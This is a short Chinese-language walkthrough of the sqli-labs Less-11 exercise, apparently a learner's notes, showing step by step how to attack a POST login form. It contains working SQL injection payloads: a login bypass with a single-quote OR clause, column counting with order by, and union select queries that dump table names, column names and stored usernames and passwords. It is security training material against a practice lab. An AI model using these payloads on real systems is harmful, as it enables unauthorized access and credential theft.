#sqli-labs less 11

终于到post的阶段了
#sqli-labs less 11
首先试一下常见的弱口令

username:admin password:admin

#sqli-labs less 11
结果就成功了。。。

算了，‘正规套路’去搞吧

顺便练练burp

在登陆框中写入 admin 111

#sqli-labs less 11

接下来试试

admin’

111

#sqli-labs less 11
得到>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘111’ LIMIT 0,1’ at line 1证明是单引号字符型

尝试用admin’or 1=1–+

admin’or ‘1’=‘1’ --+
#sqli-labs less 11

#sqli-labs less 11

发现admin’or ‘1’='1–+ 可以顺利绕过

接下来试着用admin’ order by n–+

通过改变n 发现到order by 3时才回显错误

#sqli-labs less 11

接着用admin’ union select 1,2–+ 来查看回显位，却一直不能成功

接着我试了在passwd=11’ union select 1,2–+,回显成功
#sqli-labs less 11

这。。。我得查查

反正接下来在passwd这注入点进行攻击

11’nion select user(),version() --+
#sqli-labs less 11
ok 用常规的playload

union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=‘security’)–+
#sqli-labs less 11
union select 1,(select group_concat(column_name)from information_schema.columns where table_name=‘users’)–+

union select 1,(select group_concat(username,’;’,password) from security.users)–+

(select group_concat(username,’;’,password) from security.users)–+

…